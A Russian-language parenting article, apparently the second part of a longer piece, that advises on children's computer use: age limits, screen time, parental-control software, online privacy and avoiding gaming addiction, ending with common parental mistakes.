- Знакомить детей с компьютером следует не раньше трёх- четырёхлетнего возраста. Особое внимание при этом следует уделять психическим особенностям вашего ребёнка. Спокойному, уравновешенному малышу могут подойти почти все игры, предназначенные для самых маленьких детей. Для впечатлительного, нервного малыша необходимы спокойные, логические игры. Для таких детей самыми неподходящими будут игры с быстро двигающимися предметами, мелкими деталями, требующие повышенной сосредоточенности, способные вызвать нервное истощение.
- При покупке дисков с компьютерными играми обращайте внимание на надписи на коробках о рекомендуемом возрасте, содержании игр.
- Настоятельно не рекомендуется ставить компьютер на рабочее место ребёнка и в детской спальне. При соблюдении этого простого правила вы сможете легко контролировать все действия своего ребёнка и будете в курсе того, чем он в данный момент занят: уроками или развлечениями.
- Следует заранее предупредить малыша о том, сколько времени он будет проводить за монитором. Некоторые психологи предлагают умножать возраст ребёнка на три. Полученный результат переводится в минуты. Например, 5Х3=15; итог умножения соответствует пятнадцати минутам компьютерного времени. На это время отложите все свои дела и присядьте рядом с малышом. При этом вам проще будет отклонить уговоры ребёнка поиграть ещё. Запомните главное: нужно заранее, до включения компьютера убедительно объявить об установленных правилах, и о том, что эти правила должны выполняться как ребёнком, так и взрослым.
- Установите контроль над пребыванием малыша в сети. Но сделайте это так, чтобы ребёнок не догадался об этом. Для этого подойдёт предустановленный почти во всех браузерах и антивирусных программах «родительский контроль», а также специализированнее программы, способные заблокировать доступ к подозрительным сетевым ресурсам.
- Детям, не достигшим возраста восемнадцати лет, настоятельно рекомендуются не регистрироваться в социальных сетях. Мало того, что социальные сети впустую забирают много времени, они при этом ещё потенциально опасны для детей.
- Объясните и почаще напоминайте ребёнку о том, что в сети требуется хранить в тайне свои личные данные, никому и ни под каким предлогом не следует сообщать свои фамилию, адрес, номер телефона. Разъясните малышу то, как он должен себя вести, если столкнётся в сети с нестандартными предложениями, угрозами, агрессией в свой адрес.

Как бороться с уходом в виртуальность.

Несколько советов для родителей, заметивших у своих детей подобные симптомы. Для их выполнения потребуется проявить последовательность и твёрдость характера.
- Для ограждения маленьких детей от компьютера можно снять и спрятать шнуры, соединяющие периферийные устройства. С ограничением доступа к сети детей старшего возраста можно применить блокировку тех сетевых ресурсов, что вызвали игроманию.
- Показывайте на личном примере, что компьютер необходим только для работы. Как можно больше привлекайте своего ребёнка к совместному времяпрепровождению: устраивайте походы в кинотеатры, выезжайте на природу. Всячески поощряйте общение ребёнка с друзьями. Подобные действия способны внушить ребёнку мысль, что реальная жизнь гораздо интереснее и ярче жизни виртуальной.

Главные родительские ошибки.

- Иногда родители устанавливают тотальный жёсткий контроль над детским компьютерным временем, пресекают все детские аргументы фразой наподобие часто встречающегося выражения «Потому, что я так сказал». Жёсткость в общении с детьми приводит к проявлению у них протестных реакций; такие дети начинают считать, что родителям до него нет никакого дела.

- Самая главная ошибка родителей состоит в полном запрете на работу ребёнка за компьютером. В первой части этой статьи упоминалось о том, что современным школьникам компьютер необходим для полноценного учебного процесса. Устанавливая запрет на компьютер, вы создадите ребёнку сложности в общении с друзьями, ограничите доступ к необходимой учебной информации. Такой родительский подход способен сформировать у ребёнка нерациональное использование компьютерного времени, ведь детей привлекает больше всего то, что находится под запретом. Не стоит бояться знакомить вашего ребёнка с компьютерными возможностями. Ваш собственный пример, доверительные открытые отношения, совместное времяпрепровождение способны предотвратить компьютерную зависимость. Ваши понятные объяснения и обучение основным принципам работы за компьютером, превратят ребёнка в уверенного пользователя, ценящего радости реального мира.

Читайте также: